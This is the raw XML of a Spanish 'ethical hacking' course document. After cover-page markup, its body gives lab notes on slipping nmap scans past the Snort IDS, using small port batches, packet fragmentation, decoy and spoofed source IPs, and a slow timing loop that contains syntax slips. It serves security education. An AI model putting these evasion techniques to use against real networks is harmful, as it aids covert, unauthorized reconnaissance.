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71087571"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:lang w:eastAsia="es-ES"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="079ED61D" w14:textId="753CDB84" w:rsidR="001C112F" w:rsidRDefault="001C112F">
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <mc:AlternateContent>
              <mc:Choice Requires="wpg">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7388C643" wp14:editId="612AED3A">
                    <wp:simplePos x="0" y="0"/>
                    <wp:positionH relativeFrom="page">
                      <wp:align>center</wp:align>
                    </wp:positionH>
                    <wp:positionV relativeFrom="page">
                      <wp:align>center</wp:align>
                    </wp:positionV>
                    <wp:extent cx="6864824" cy="9123528"/>
                    <wp:effectExtent l="0" t="0" r="2540" b="635"/>
                    <wp:wrapNone/>
                    <wp:docPr id="193" name="Grupo 62"/>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ángulo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ángulo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111B8402" w14:textId="4C365063" w:rsidR="001C112F" w:rsidRDefault="001C112F">
                                      <w:pPr>
                                        <w:pStyle w:val="Sinespaciado"/>
                                        <w:spacing w:before="120"/>
                                        <w:jc w:val="center"/>
                                        <w:rPr>
                                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                        </w:rPr>
                                      </w:pPr>
                                      <w:r>
                                        <w:rPr>
                                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                        </w:rPr>
                                        <w:t>Eliezer Cabrales Calvente</w:t>
                                      </w:r>
                                    </w:p>
                                  </w:sdtContent>
                                </w:sdt>
                                <w:p w14:paraId="67A3FC25" w14:textId="3FD3E938" w:rsidR="001C112F" w:rsidRDefault="00000000">
                                  <w:pPr>
                                    <w:pStyle w:val="Sinespaciado"/>
                                    <w:spacing w:before="120"/>
                                    <w:jc w:val="center"/>
                                    <w:rPr>
                                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                    </w:rPr>
                                  </w:pPr>
                                  <w:sdt>
                                    <w:sdtPr>
                                      <w:rPr>
                                        <w:caps/>
                                        <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                      </w:rPr>
                                      <w:alias w:val="Compañía"/>
                                      <w:tag w:val=""/>
                                      <w:id w:val="1618182777"/>
                                      <w:showingPlcHdr/>
                                      <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/officeDocument/2006/extended-properties' " w:xpath="/ns0:Properties[1]/ns0:Company[1]" w:storeItemID="{6668398D-A668-4E3E-A5EB-62B293D839F1}"/>
                                      <w:text/>
                                    </w:sdtPr>
                                    <w:sdtContent>
                                      <w:r w:rsidR="00592777">
                                        <w:rPr>
                                          <w:caps/>
                                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                        </w:rPr>
                                        <w:t xml:space="preserve">     </w:t>
                                      </w:r>
                                    </w:sdtContent>
                                  </w:sdt>
                                  <w:r w:rsidR="001C112F">
                                    <w:rPr>
                                      <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                    </w:rPr>
                                    <w:t>  </w:t>
                                  </w:r>
                                  <w:sdt>
                                    <w:sdtPr>
                                      <w:rPr>
                                        <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                      </w:rPr>
                                      <w:alias w:val="Dirección"/>
                                      <w:tag w:val=""/>
                                      <w:id w:val="-253358678"/>
                                      <w:showingPlcHdr/>
                                      <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:CompanyAddress[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
                                      <w:text/>
                                    </w:sdtPr>
                                    <w:sdtContent>
                                      <w:r w:rsidR="00592777">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Cuadro de texto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bCs/>
                                      <w:i/>
                                      <w:iCs/>
                                      <w:caps/>
                                      <w:color w:val="4472C4"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Content>
                                    <w:p w14:paraId="190CF2DB" w14:textId="36516C53" w:rsidR="001C112F" w:rsidRPr="00592777" w:rsidRDefault="00204569">
                                      <w:pPr>
                                        <w:pStyle w:val="Sinespaciado"/>
                                        <w:jc w:val="center"/>
                                        <w:rPr>
                                          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
                                          <w:b/>
                                          <w:bCs/>
                                          <w:i/>
                                          <w:iCs/>
                                          <w:caps/>
                                          <w:color w:val="4472C4" w:themeColor="accent1"/>
                                          <w:sz w:val="72"/>
                                          <w:szCs w:val="72"/>
                                        </w:rPr>
                                      </w:pPr>
                                      <w:r>
                                        <w:rPr>
                                          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
                                          <w:b/>
                                          <w:bCs/>
                                          <w:i/>
                                          <w:iCs/>
                                          <w:caps/>
                                          <w:color w:val="4472C4" w:themeColor="accent1"/>
                                          <w:sz w:val="72"/>
                                          <w:szCs w:val="72"/>
                                        </w:rPr>
                                        <w:t>Hacking Ético avanzado</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388C643" id="Grupo 62"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">
                    <v:rect id="Rectángulo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ángulo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111B8402" w14:textId="4C365063" w:rsidR="001C112F" w:rsidRDefault="001C112F">
                                <w:pPr>
                                  <w:pStyle w:val="Sinespaciado"/>
                                  <w:spacing w:before="120"/>
                                  <w:jc w:val="center"/>
                                  <w:rPr>
                                    <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r>
                                  <w:rPr>
                                    <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                  </w:rPr>
                                  <w:t>Eliezer Cabrales Calvente</w:t>
                                </w:r>
                              </w:p>
                            </w:sdtContent>
                          </w:sdt>
                          <w:p w14:paraId="67A3FC25" w14:textId="3FD3E938" w:rsidR="001C112F" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:pStyle w:val="Sinespaciado"/>
                              <w:spacing w:before="120"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              </w:rPr>
                            </w:pPr>
                            <w:sdt>
                              <w:sdtPr>
                                <w:rPr>
                                  <w:caps/>
                                  <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                </w:rPr>
                                <w:alias w:val="Compañía"/>
                                <w:tag w:val=""/>
                                <w:id w:val="1618182777"/>
                                <w:showingPlcHdr/>
                                <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/officeDocument/2006/extended-properties' " w:xpath="/ns0:Properties[1]/ns0:Company[1]" w:storeItemID="{6668398D-A668-4E3E-A5EB-62B293D839F1}"/>
                                <w:text/>
                              </w:sdtPr>
                              <w:sdtContent>
                                <w:r w:rsidR="00592777">
                                  <w:rPr>
                                    <w:caps/>
                                    <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                  </w:rPr>
                                  <w:t xml:space="preserve">     </w:t>
                                </w:r>
                              </w:sdtContent>
                            </w:sdt>
                            <w:r w:rsidR="001C112F">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                              </w:rPr>
                              <w:t>  </w:t>
                            </w:r>
                            <w:sdt>
                              <w:sdtPr>
                                <w:rPr>
                                  <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                </w:rPr>
                                <w:alias w:val="Dirección"/>
                                <w:tag w:val=""/>
                                <w:id w:val="-253358678"/>
                                <w:showingPlcHdr/>
                                <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.microsoft.com/office/2006/coverPageProps' " w:xpath="/ns0:CoverPageProperties[1]/ns0:CompanyAddress[1]" w:storeItemID="{55AF091B-3C7A-41E3-B477-F2FDAA23CFDA}"/>
                                <w:text/>
                              </w:sdtPr>
                              <w:sdtContent>
                                <w:r w:rsidR="00592777">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Cuadro de texto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b/>
                                <w:bCs/>
                                <w:i/>
                                <w:iCs/>
                                <w:caps/>
                                <w:color w:val="4472C4"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Content>
                              <w:p w14:paraId="190CF2DB" w14:textId="36516C53" w:rsidR="001C112F" w:rsidRPr="00592777" w:rsidRDefault="00204569">
                                <w:pPr>
                                  <w:pStyle w:val="Sinespaciado"/>
                                  <w:jc w:val="center"/>
                                  <w:rPr>
                                    <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
                                    <w:b/>
                                    <w:bCs/>
                                    <w:i/>
                                    <w:iCs/>
                                    <w:caps/>
                                    <w:color w:val="4472C4" w:themeColor="accent1"/>
                                    <w:sz w:val="72"/>
                                    <w:szCs w:val="72"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r>
                                  <w:rPr>
                                    <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
                                    <w:b/>
                                    <w:bCs/>
                                    <w:i/>
                                    <w:iCs/>
                                    <w:caps/>
                                    <w:color w:val="4472C4" w:themeColor="accent1"/>
                                    <w:sz w:val="72"/>
                                    <w:szCs w:val="72"/>
                                  </w:rPr>
                                  <w:t>Hacking Ético avanzado</w:t>
                                </w:r>
                              </w:p>
                            </w:sdtContent>
                          </w:sdt>
                        </w:txbxContent>
                      </v:textbox>
                    </v:shape>
                    <w10:wrap anchorx="page" anchory="page"/>
                  </v:group>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
        </w:p>
        <w:p w14:paraId="5A1274E6" w14:textId="46DBB1B2" w:rsidR="001C112F" w:rsidRDefault="001C112F">
          <w:pPr>
            <w:spacing w:line="259" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:color w:val="4472C4" w:themeColor="accent1"/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:color w:val="4472C4" w:themeColor="accent1"/>
              <w:lang w:eastAsia="es-ES"/>
            </w:rPr>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="6A509950" w14:textId="127FF2BF" w:rsidR="001C112F" w:rsidRDefault="001C112F" w:rsidP="001C112F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Recopilación Avanzada de Información</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519053DD" w14:textId="77777777" w:rsidR="001C112F" w:rsidRPr="001C112F" w:rsidRDefault="001C112F" w:rsidP="001C112F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77762D05" w14:textId="244DD179" w:rsidR="001C112F" w:rsidRPr="00040C54" w:rsidRDefault="001C112F" w:rsidP="001C112F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00040C54">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Escaneo Avanzado de Host</w:t>
      </w:r>
      <w:r w:rsidR="00866A80" w:rsidRPr="00040C54">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00937FB0" w:rsidRPr="00040C54">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">NMAP vs </w:t>
      </w:r>
      <w:r w:rsidR="00866A80" w:rsidRPr="00040C54">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>IDS)</w:t>
      </w:r>
      <w:r w:rsidRPr="00040C54">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDC59E4" w14:textId="77777777" w:rsidR="001C112F" w:rsidRDefault="001C112F" w:rsidP="001C112F">
      <w:r>
        <w:t xml:space="preserve">Nos vamos a encontrar en un laboratorio con </w:t>
      </w:r>
      <w:r w:rsidRPr="001C112F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
        </w:rPr>
        <w:t>Snort</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> instalado, un IDS capaz de detectar actividad maliciosa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DC9DCC" w14:textId="2AC93B13" w:rsidR="001C112F" w:rsidRDefault="001C112F" w:rsidP="001C112F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F141AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F141AD" w:rsidRPr="00F141AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Nmap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EC0E1D" w14:textId="3A5DE485" w:rsidR="006B71BA" w:rsidRDefault="006B71BA" w:rsidP="006B71BA">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Nodos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B367ED" w14:textId="57172BBB" w:rsidR="0002645D" w:rsidRPr="00265A8E" w:rsidRDefault="006B71BA" w:rsidP="0002645D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidR="0002645D" w:rsidRPr="00265A8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nmap -</w:t>
      </w:r>
      <w:r w:rsidR="0002645D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PS -sn</w:t>
      </w:r>
      <w:r w:rsidR="0002645D" w:rsidRPr="00265A8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -n 192.168.20.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AFB439" w14:textId="6B3D453A" w:rsidR="00265A8E" w:rsidRDefault="00265A8E" w:rsidP="00F141AD">
      <w:r>
        <w:t>Con este comando indicamos con -sn que todo el tráfico sea ARP, por lo que el IDS no puede interceptarlo ya que loe hemos dicho que NO busque los puertos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3006DA" w14:textId="0DEEAB28" w:rsidR="00265A8E" w:rsidRPr="006B71BA" w:rsidRDefault="006B71BA" w:rsidP="00F141AD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006B71BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Puertos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1828CAA4" w14:textId="05F9CF2A" w:rsidR="006B71BA" w:rsidRPr="006B71BA" w:rsidRDefault="006B71BA" w:rsidP="00F141AD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B71BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo nmap -sS -n --top-ports 5 (ip del host)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02372261" w14:textId="4FA126C0" w:rsidR="006B71BA" w:rsidRDefault="006B71BA" w:rsidP="00F141AD">
      <w:r>
        <w:t xml:space="preserve">Con </w:t>
      </w:r>
      <w:r w:rsidRPr="006B71BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>--top-ports 5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> buscará entre los 5 puertos más usados</w:t>
      </w:r>
      <w:r w:rsidR="008368FF">
        <w:t>. Es importante ir de 5 en 5, para que los IDS no lo detecten, si ponemos 10, por ejemplo, lo detectará.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0D5D39" w14:textId="44BB4FE3" w:rsidR="006B71BA" w:rsidRDefault="006B71BA" w:rsidP="00F141AD">
      <w:r>
        <w:t>También podemos ponerlos manualmente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AC1AE6" w14:textId="5E4F6673" w:rsidR="006B71BA" w:rsidRPr="006B71BA" w:rsidRDefault="006B71BA" w:rsidP="00F141AD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B71BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo nmap -sS -n -p10,11,15,32 (ip del host)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FED074D" w14:textId="78B8C45B" w:rsidR="006B71BA" w:rsidRDefault="006B71BA" w:rsidP="00F141AD"/>
    <w:p w14:paraId="6351DA42" w14:textId="3C2B9F7B" w:rsidR="00A97DF5" w:rsidRPr="00A97DF5" w:rsidRDefault="00A97DF5" w:rsidP="00F141AD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A97DF5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Dividir el paquete:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709203E1" w14:textId="389B057A" w:rsidR="00A97DF5" w:rsidRDefault="00A97DF5" w:rsidP="00F141AD">
      <w:r>
        <w:t>No es especialmente útil, pues a día de hoy es detectado por la mayoría de IDS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2DDD22" w14:textId="52DBEAF7" w:rsidR="00A97DF5" w:rsidRPr="00A97DF5" w:rsidRDefault="00A97DF5" w:rsidP="00F141AD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A97DF5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo nmap -sS -f -p80 (ip host)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494B5CFA" w14:textId="599FF988" w:rsidR="00A97DF5" w:rsidRDefault="00A97DF5" w:rsidP="00F141AD">
      <w:r>
        <w:t>Con -f fragmentamos el paquete, ideal para saltarnos Firewalls, pero no funciona con IDS. PERO, si es interesante que si lo fragmentamos aún más con (otra f):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E22D5FA" w14:textId="097793B1" w:rsidR="00A97DF5" w:rsidRPr="00A97DF5" w:rsidRDefault="00A97DF5" w:rsidP="00A97DF5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A97DF5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo nmap -sS -f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00A97DF5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -p80 (ip host)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CAA4D8" w14:textId="57F7BC0B" w:rsidR="00A97DF5" w:rsidRDefault="00A97DF5" w:rsidP="00F141AD">
      <w:r>
        <w:t>Sí evadimos en este caso a Snort y los Firewall, aunque sigue siendo demasiado antiguo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F5E589" w14:textId="4FF262D4" w:rsidR="00A97DF5" w:rsidRPr="00982F37" w:rsidRDefault="00982F37" w:rsidP="00F141AD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00982F37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Nmap con Señuelo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C6358F" w14:textId="659CEB7B" w:rsidR="00982F37" w:rsidRDefault="00982F37" w:rsidP="00F141AD">
      <w:r>
        <w:t>Modificamos la ip de origen con un simple spoof, lo que engañará a los IDS, las direcciones indicadas en el comando, para que sea REALISTA, deben ser ips que realmente se encuentren activas en ese momento, así que previamente hay que descubrirlas con la técnica anterior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37296C0B" w14:textId="161BBE9F" w:rsidR="00982F37" w:rsidRPr="00982F37" w:rsidRDefault="00982F37" w:rsidP="00F141AD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00982F37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo nmap -sS -n -D 192.168.20.1,ME 192.168.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B66CA7C" w14:textId="46634D2F" w:rsidR="00982F37" w:rsidRDefault="00982F37" w:rsidP="00F141AD">
      <w:r>
        <w:t>Como vemos, con -D decidimos qué Ip va a ser nuestra cabeza de turco. El IDS ha detectado a la IP falsa como la culpable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A94DE36" w14:textId="479537F0" w:rsidR="009B092A" w:rsidRDefault="009B092A" w:rsidP="00F141AD">
      <w:r>
        <w:t>IMPORTANTE NO USAR LA IP DEL HOST QUE QUERAMOS IDENTIFICAR. Si lo hiciéramos, sería avisar a todos que realmente estamos haciendo el spoof de ip.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428FDAA3" w14:textId="6F4E3987" w:rsidR="009B092A" w:rsidRPr="00592777" w:rsidRDefault="00592777" w:rsidP="00F141AD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00592777">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Spoofing de Identidad:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2701E7C8" w14:textId="481DA7C7" w:rsidR="00592777" w:rsidRDefault="00592777" w:rsidP="00F141AD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00592777">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">udo nmap -Pn -S (ip falsa a disfrazar) -n -e </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(interfaz donde recibimos paquetes)</w:t>
      </w:r>
      <w:r w:rsidRPr="00592777">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (ip a atacar)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77293866" w14:textId="49F26771" w:rsidR="00592777" w:rsidRPr="00592777" w:rsidRDefault="00592777" w:rsidP="00592777">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00592777">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">udo nmap -Pn -S 192.168.20.1 -n -e eth0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">--source-port 80 </w:t>
      </w:r>
      <w:r w:rsidRPr="00592777">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>192.168.20.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208A9020" w14:textId="40BF44ED" w:rsidR="00592777" w:rsidRDefault="00592777" w:rsidP="00592777">
      <w:r>
        <w:t xml:space="preserve">De esta forma engañamos a la red, haciéndonos pasar por una IP que no es la nuestra. Además con </w:t>
      </w:r>
      <w:r w:rsidRPr="00592777">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>--source-port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> podemos engañar a la red diciéndole que todo va por una petición del puerto 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C40D85" w14:textId="5EF5E36B" w:rsidR="004338B9" w:rsidRDefault="004338B9" w:rsidP="00592777">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004338B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Escaneo por Timing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A226DA5" w14:textId="6A288831" w:rsidR="004338B9" w:rsidRDefault="004338B9" w:rsidP="004338B9">
      <w:r>
        <w:t>Podemos intentar que el escaneo sea más lento. -T1 se caracteriza por ser un escaneo muy lento, pero a día de hoy es detectable. Además T0 es prácticamente inviable. Podríamos hacer uso del siguiente script para cambiar los tiempos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F64074" w14:textId="4BB4C0D9" w:rsidR="0012672E" w:rsidRDefault="0012672E" w:rsidP="00592777">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0012672E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">for i in {0..15..2}; do; sudo nmap -n - -top-ports $(($i+1))-(($i+2)) 192.168.119.132; sleep </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="0012672E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0; done;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70572603" w14:textId="3FD239B6" w:rsidR="0012672E" w:rsidRPr="0012672E" w:rsidRDefault="0012672E" w:rsidP="00592777">
      <w:r w:rsidRPr="0012672E">
        <w:t>Este script hace un bucle de 0 a 15 de dos en dos, y con una espera de 50 segundos, va escaneando. Por lo que es difícil que los IDS se percaten del escaneo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23525149" w14:textId="55CD6265" w:rsidR="004338B9" w:rsidRPr="00A17F92" w:rsidRDefault="00A17F92" w:rsidP="00592777">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A17F92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
